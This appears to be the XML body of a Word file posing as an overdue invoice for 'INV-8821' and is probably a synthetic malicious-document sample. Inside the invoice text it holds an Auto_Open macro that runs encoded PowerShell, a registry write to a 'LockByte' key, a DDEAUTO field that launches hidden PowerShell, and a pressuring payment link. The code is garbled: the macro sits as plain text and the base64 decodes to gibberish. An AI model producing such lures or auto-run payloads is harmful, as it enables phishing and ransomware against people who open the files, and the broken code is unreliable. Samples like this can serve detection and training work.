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NOT A REAL PAYMENT NOTICE</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module LockByteInvoice</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Sub Auto_Open()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Shell("powershell -EncodedCommand TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0ICgpIFNoZWxsICJwb3dlcnNoZWxsIC1FbmNvZGVkQ29tbWFuZCAyOTI0dWpzIiBEdW5kICJjbWQgL2MgcmVnIGFkZCBIS0xNIFNvZnR3YXJlXFJhbnNvbVdhcmUi")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">CreateObject("WScript.Shell").RegWrite "HKLM\Software\LockByte\Key", "1"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">DDEAUTO "C:\Windows\System32\cmd.exe" "/c powershell -w hidden -e TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmlj"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Your invoice INV-8821 for the amount of $4,250.00 is overdue.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Settlement is required within 48 hours to avoid service interruption.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Payment portal: http://192.168.14.7/payment-portal/pay.php?token=a1b2c3&redirect=https://lockbyte.example.net</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Reference code: TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0ICgpIFNoZWxsICJwb3dlcnNoZWxsIC1FbmNvZGVkQ29tbWFuZCAyOTI0dWpzIiBEdW5kICJjbWQgL2MgcmVnIGFkZCBIS0xNIFNvZnR3YXJlXFJhbnNvbVdhcmUi</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Regards, Accounts Payable Team</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>